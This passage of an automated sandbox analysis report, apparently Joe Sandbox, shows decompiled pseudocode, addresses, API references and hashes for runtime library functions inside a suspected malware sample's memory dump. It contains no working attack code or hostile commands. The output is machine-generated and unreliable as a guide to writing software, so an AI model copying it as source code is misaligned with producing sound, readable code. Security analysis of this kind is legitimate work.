						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00403120(_t107, E00402768(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00403120(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x415c6c; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x40e160();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0040579A(_t75, _t84, _t97, _t107);
									asm("int3");
									_push(8);
									_push(0x413538);
									E00401EE0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00403694(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00404404(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00404414(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00402768();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                        0x00403694
                        0x00403696
                        0x0040369b
                        0x004036a0
                        0x004036a2
                        0x004036a5
                        0x004036aa
                        0x004037ba
                        0x004037ba
                        0x004037ba
                        0x00000000
                        0x004036b9
                        0x004036b9
                        0x004036be
                        0x004036c8
                        0x004036ca
                        0x004036cf
                        0x004036d4
                        0x004036d4
                        0x004036d6
                        0x004036d9
                        0x004036de
                        0x00403700
                        0x00403700
                        0x00403703
                        0x00403706
                        0x00403724
                        0x00403727
                        0x00403766
                        0x00403769
                        0x0040376c
                        0x00403791
                        0x00403793
                        0x00000000
                        0x00403795
                        0x00403795
                        0x00403797
                        0x00000000
                        0x00403799
                        0x00403799
                        0x0040379e
                        0x004037a2
                        0x004037a2
                        0x004037a3
                        0x00000000
                        0x004037a3
                        0x00403797
                        0x0040376e
                        0x0040376e
                        0x00403770
                        0x00000000
                        0x00403772
                        0x00403772
                        0x00403774
                        0x00000000
                        0x00403776
                        0x00403787
                        0x00000000
                        0x0040378c
                        0x00403774
                        0x00403770
                        0x00403729
                        0x00403729
                        0x0040372d
                        0x00000000
                        0x00403733
                        0x00403733
                        0x00403735
                        0x00000000
                        0x0040373b
                        0x00403742
                        0x0040374a
                        0x0040374e
                        0x00403750
                        0x00403753
                        0x00403758
                        0x00403759
                        0x00000000
                        0x00403759
                        0x00403753
                        0x00000000
                        0x0040374e
                        0x00403735
                        0x0040372d
                        0x00403708
                        0x00403708
                        0x00000000
                        0x00403708
                        0x004036e5
                        0x004036e5
                        0x004036ea
                        0x004036ef
                        0x00000000
                        0x004036f1
                        0x004036f3
                        0x004036fc
                        0x0040370b
                        0x0040370d
                        0x004037cc
                        0x004037cc
                        0x004037d1
                        0x004037d2
                        0x004037d4
                        0x004037d9
                        0x004037de
                        0x004037e1
                        0x004037e4
                        0x004037e7
                        0x004037f0
                        0x004037f0
                        0x004037e9
                        0x004037e9
                        0x004037e9
                        0x004037f3
                        0x004037f7
                        0x004037fa
                        0x004037fb
                        0x004037fc
                        0x004037fd
                        0x00403800
                        0x00403809
                        0x00403809
                        0x0040380c
                        0x00403842
                        0x0040380e
                        0x0040380e
                        0x0040380e
                        0x00403811
                        0x00403828
                        0x00403828
                        0x00403811
                        0x00403847
                        0x00403851
                        0x0040385d
                        0x0040371b
                        0x0040371b
                        0x00403720
                        0x00403721
                        0x0040375b
                        0x00403762
                        0x004037a6
                        0x004037a6
                        0x004037ad
                        0x004037bc
                        0x004037bf
                        0x004037cb
                        0x004037cb
                        0x0040370d
                        0x004036ef
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004036be

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                        • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                        • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                        • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01071597 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01071597(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t60;
				char* _t63;

				_t63 = _a8;
				if(_t63 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t63 != 0) {
					E01065839(_t50,  &_v20, __edx, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E010703F5( *_t63 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t60 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t60;
							}
							L20:
							_t44 = E010647CC(__eflags);
							_t60 = _t60 | 0xffffffff;
							__eflags = _t60;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t60 = _v20;
						__eflags =  *(_t60 + 0x74) - 1;
						if( *(_t60 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t60 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t63[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t60 =  *(_t60 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t60 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t60 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t63 & 0x000000ff;
					}
					_t60 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                        0x0107159f
                        0x010715a4
                        0x010715be
                        0x00000000
                        0x010715be
                        0x010715a6
                        0x010715ab
                        0x00000000
                        0x00000000
                        0x010715b0
                        0x010715cb
                        0x010715d0
                        0x010715d3
                        0x010715da
                        0x010715f9
                        0x01071600
                        0x01071602
                        0x01071646
                        0x0107164e
                        0x01071663
                        0x01071665
                        0x01071675
                        0x01071675
                        0x01071679
                        0x0107167b
                        0x0107167e
                        0x0107167e
                        0x0107167e
                        0x0107167e
                        0x00000000
                        0x01071684
                        0x01071667
                        0x01071667
                        0x0107166c
                        0x0107166c
                        0x0107166f
                        0x00000000
                        0x0107166f
                        0x01071604
                        0x01071607
                        0x0107160b
                        0x01071634
                        0x01071634
                        0x01071637
                        0x01071637
                        0x00000000
                        0x00000000
                        0x01071639
                        0x0107163d
                        0x00000000
                        0x00000000
                        0x0107163f
                        0x0107163f
                        0x00000000
                        0x0107163f
                        0x0107160d
                        0x01071610
                        0x00000000
                        0x00000000
                        0x01071614
                        0x01071627
                        0x0107162d
                        0x01071630
                        0x01071632
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01071632
                        0x010715dc
                        0x010715df
                        0x010715e1
                        0x010715e6
                        0x010715e6
                        0x010715eb
                        0x00000000
                        0x010715eb
                        0x010715b2
                        0x010715b7
                        0x010715bb
                        0x010715bb
                        0x00000000

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010715CB
                        • __isleadbyte_l.LIBCMT ref: 010715F9
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 01071627
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0107165D
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction ID: 0d806addd46576e8d9c343e52224aa2292d5002b4fb6148188df7f120cb8224e
                        • Opcode Fuzzy Hash: 5535c6c9c1236ba3afa5c93c3669862bb266e21c5b1217fb2cad64e5ce3a2d97
                        • Instruction Fuzzy Hash: 0B31CF31E00246EFEB268F69C844BAA7FFAFF45210F1941A9F5A1971D0E731D850CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040B766 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040B766(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040B74F();
					E0040B711();
					_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                        0x0040b783
                        0x0040b787
                        0x0040b794
                        0x0040b799
                        0x0040b7b4
                        0x0040b7b4
                        0x0040b7ba

                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                        • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
                          • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                        • ___initconout.LIBCMT ref: 0040B799
                          • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                        • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                        • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                        • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403C90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 65%
                        			E00403C90(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_t75 = E004029B3(_t96, __ecx, __edx, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E004029B3(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00402E31(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00402D64(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0040386B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0040579A(_t96, _t100, _t110, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}













































                        0x00403c90
                        0x00403c90
                        0x00403c97
                        0x00403ca0
                        0x00403dbf
                        0x00403ca6
                        0x00403ca6
                        0x00403ca8
                        0x00403cb2
                        0x00403cb5
                        0x00403cbb
                        0x00403cc5
                        0x00403cea
                        0x00403cef
                        0x00403cf4
                        0x00403dbb
                        0x00000000
                        0x00403dbc
                        0x00403cf4
                        0x00403cc5
                        0x00403cfa
                        0x00403cfd
                        0x00403d00
                        0x00403d06
                        0x00403d0c
                        0x00403d1e
                        0x00403d23
                        0x00403d26
                        0x00403d29
                        0x00403d2c
                        0x00403d2f
                        0x00403d35
                        0x00403d3b
                        0x00403d3e
                        0x00403d41
                        0x00403d50
                        0x00403d51
                        0x00403d51
                        0x00403d56
                        0x00403d69
                        0x00403d6b
                        0x00403d70
                        0x00403d7b
                        0x00403d7d
                        0x00403d7f
                        0x00403d9b
                        0x00403da0
                        0x00403da3
                        0x00403da3
                        0x00403d7b
                        0x00403d70
                        0x00403da9
                        0x00403daa
                        0x00403dad
                        0x00403db0
                        0x00403db3
                        0x00403db6
                        0x00403d41
                        0x00000000
                        0x00403d35
                        0x00403dc0
                        0x00403dc5
                        0x00403dc9
                        0x00403dcc
                        0x00403dcd
                        0x00403dce
                        0x00403dcf
                        0x00403dd4
                        0x00403e4c
                        0x00403e4e
                        0x00403dd6
                        0x00403dd6
                        0x00403ddc
                        0x00000000
                        0x00403dde
                        0x00403de1
                        0x00403de4
                        0x00403deb
                        0x00403dee
                        0x00403df2
                        0x00403e24
                        0x00403e27
                        0x00403e2e
                        0x00403e34
                        0x00403e3e
                        0x00403e47
                        0x00403e47
                        0x00403e3e
                        0x00403e34
                        0x00403e48
                        0x00403df4
                        0x00403df4
                        0x00403df4
                        0x00403df7
                        0x00403df7
                        0x00403dfb
                        0x00000000
                        0x00000000
                        0x00403dff
                        0x00403e13
                        0x00403e13
                        0x00403e01
                        0x00403e01
                        0x00403e07
                        0x00000000
                        0x00403e09
                        0x00403e09
                        0x00403e0c
                        0x00403e11
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e11
                        0x00403e07
                        0x00403e1c
                        0x00403e1e
                        0x00000000
                        0x00403e20
                        0x00403e20
                        0x00403e20
                        0x00000000
                        0x00403e1e
                        0x00403e17
                        0x00403e19
                        0x00000000
                        0x00403e19
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403de4
                        0x00403ddc
                        0x00403e4f
                        0x00403e53
                        0x00403e53

                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403CB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                        • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                        • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                        • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004018D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E004018D4(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t10;
				intOrPtr _t15;
				signed int _t16;
				signed int _t18;
				signed int _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				intOrPtr* _t33;
				void* _t36;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				_t36 = _t24 -  *0x415010; // 0xcf17a32a
				if(_t36 != 0) {
					_t31 = _t33;
					_t10 = IsProcessorFeaturePresent(0x17);
					if(_t10 != 0) {
						_t24 = 2;
						asm("int 0x29");
					}
					 *0x415a48 = _t10;
					 *0x415a44 = _t24;
					 *0x415a40 = _t27;
					 *0x415a3c = _t23;
					 *0x415a38 = _t29;
					 *0x415a34 = _t28;
					 *0x415a60 = ss;
					 *0x415a54 = cs;
					 *0x415a30 = ds;
					 *0x415a2c = es;
					 *0x415a28 = fs;
					 *0x415a24 = gs;
					asm("pushfd");
					_pop( *0x415a58);
					 *0x415a4c =  *_t31;
					 *0x415a50 = _v0;
					 *0x415a5c =  &_a4;
					 *0x415998 = 0x10001;
					_t15 =  *0x415a50; // 0x0
					 *0x415954 = _t15;
					 *0x415948 = 0xc0000409;
					 *0x41594c = 1;
					 *0x415958 = 1;
					_t16 = 4;
					 *((intOrPtr*)(0x41595c + _t16 * 0)) = 2;
					_t18 = 4;
					_t25 =  *0x415010; // 0xcf17a32a
					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
					_t20 = 4;
					_t26 =  *0x415014; // 0x30e85cd5
					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
					return E00401F2A("HYA");
				} else {
					return __eax;
				}
			}




















                        0x004018d4
                        0x004018d4
                        0x004018d4
                        0x004018d4
                        0x004018d4
                        0x004018d4
                        0x004018da
                        0x00401f53
                        0x00401f5d
                        0x00401f65
                        0x00401f69
                        0x00401f6a
                        0x00401f6a
                        0x00401f6c
                        0x00401f71
                        0x00401f77
                        0x00401f7d
                        0x00401f83
                        0x00401f89
                        0x00401f8f
                        0x00401f96
                        0x00401f9d
                        0x00401fa4
                        0x00401fab
                        0x00401fb2
                        0x00401fb9
                        0x00401fba
                        0x00401fc3
                        0x00401fcb
                        0x00401fd3
                        0x00401fde
                        0x00401fe8
                        0x00401fed
                        0x00401ff2
                        0x00401ffc
                        0x00402006
                        0x00402012
                        0x00402016
                        0x00402022
                        0x00402026
                        0x0040202c
                        0x00402032
                        0x00402036
                        0x0040203c
                        0x0040204b
                        0x004018dc
                        0x004018dc
                        0x004018dc

                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                        • ___raise_securityfailure.LIBCMT ref: 00402045
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: HYA
                        • API String ID: 3761405300-3949630065
                        • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                        • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                        • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                        • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                        Uniqueness

                        Uniqueness Score: -1.00%